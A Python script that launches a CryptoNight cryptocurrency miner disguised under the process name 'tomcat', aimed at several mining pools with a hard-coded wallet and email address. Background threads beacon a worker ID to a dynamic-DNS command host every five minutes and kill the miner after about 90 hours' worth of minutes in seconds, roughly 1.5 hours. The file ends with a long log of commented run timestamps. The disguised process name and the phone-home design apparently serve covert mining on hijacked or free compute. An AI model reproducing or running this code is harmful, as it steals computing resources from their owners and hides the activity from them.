import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:54:07.607526
#2018-02-17 16:42:06.330703
#2018-02-17 18:29:04.502108
#2018-02-17 20:18:01.503131
#2018-02-17 22:04:04.971060
#2018-02-17 23:48:04.226443
#2018-02-18 01:37:05.024518
#2018-02-18 03:24:06.986175
#2018-02-18 05:12:06.703141
#2018-02-18 07:04:03.227049
#2018-02-18 08:52:04.998516
#2018-02-18 10:39:01.766053
#2018-02-18 12:24:02.036350
#2018-02-18 14:11:06.101588
#2018-02-18 16:01:07.074008
#2018-02-18 17:50:08.128975
#2018-02-18 19:37:07.095814
#2018-02-18 21:22:06.448005
#2018-02-18 23:11:04.352388
#2018-02-19 00:57:05.367027
#2018-02-19 02:44:05.932025
#2018-02-19 04:31:02.221197
#2018-02-19 06:16:06.636801
#2018-02-19 08:04:08.106649
#2018-02-19 09:54:04.316417
#2018-02-19 11:43:04.952889
#2018-02-19 13:30:07.313870
#2018-02-19 15:20:04.864729
#2018-02-19 17:10:05.332835
#2018-02-19 18:58:08.046398
#2018-02-19 20:46:06.809410
#2018-02-19 22:34:01.318792
#2018-02-20 00:19:01.798303
#2018-02-20 02:07:08.193817
#2018-02-20 03:57:03.736014
#2018-02-20 05:43:01.898227
#2018-02-20 07:29:08.020718
#2018-02-20 09:15:04.115906
#2018-02-20 10:58:01.666012
#2018-02-20 12:47:01.826277
#2018-02-20 14:31:04.594085
#2018-02-20 16:15:10.248231
#2018-02-20 18:01:07.795783
#2018-02-20 19:51:10.456193
#2018-02-20 21:40:04.085490
#2018-02-20 23:21:01.828091
#2018-02-21 01:04:05.454890
#2018-02-21 02:49:07.225370
#2018-02-21 04:34:06.658998
#2018-02-21 06:22:04.522592
#2018-02-21 08:07:06.806560
#2018-02-21 09:53:08.084801
#2018-02-21 11:42:01.756833
#2018-02-21 13:32:01.515549
#2018-02-21 15:16:09.374430
#2018-02-21 17:07:01.661095
#2018-02-21 18:53:04.668438
#2018-02-21 20:43:01.626629
#2018-02-21 22:27:01.711868
#2018-02-22 00:16:08.807040
#2018-02-22 02:04:07.879332
#2018-02-22 03:50:01.241055
#2018-02-22 05:36:07.136374
#2018-02-22 07:21:09.388013
#2018-02-22 09:09:01.642794
#2018-02-22 10:57:07.501538
#2018-02-22 12:42:01.381226
#2018-02-22 14:27:08.378535
#2018-02-22 16:13:09.026156
#2018-02-22 18:01:07.900618
#2018-02-22 19:49:04.825467
#2018-02-22 21:38:05.918621
#2018-02-22 23:24:08.381148
#2018-02-23 01:10:09.379510
#2018-02-23 02:57:06.802246
#2018-02-23 04:45:08.513887
#2018-02-23 06:31:05.775758
#2018-02-23 08:18:01.292509
#2018-02-23 10:34:06.180373
#2018-02-23 12:27:06.837789
#2018-02-23 14:14:09.054429
#2018-02-23 16:04:07.153262
#2018-02-23 17:51:07.692311
#2018-02-23 19:37:03.952689
#2018-02-23 21:19:06.539065
#2018-02-23 23:06:08.049172
#2018-02-24 00:51:01.447801
#2018-02-24 02:42:01.499026
#2018-02-24 04:36:03.696936
#2018-02-24 06:20:07.239214
#2018-02-24 08:07:07.100076
#2018-02-24 09:52:01.927675
#2018-02-24 11:46:03.776259
#2018-02-24 13:37:05.720215
#2018-02-24 15:24:05.789474
#2018-02-24 17:14:05.248729
#2018-02-24 19:06:07.590049
#2018-02-24 20:55:04.874768
#2018-02-24 23:20:09.376353
#2018-02-25 03:24:07.094238
#2018-02-25 06:05:05.134577
#2018-02-25 10:39:01.996250
#2018-02-25 12:12:01.459252
#2018-02-25 14:24:02.132252
#2018-02-25 15:59:01.664497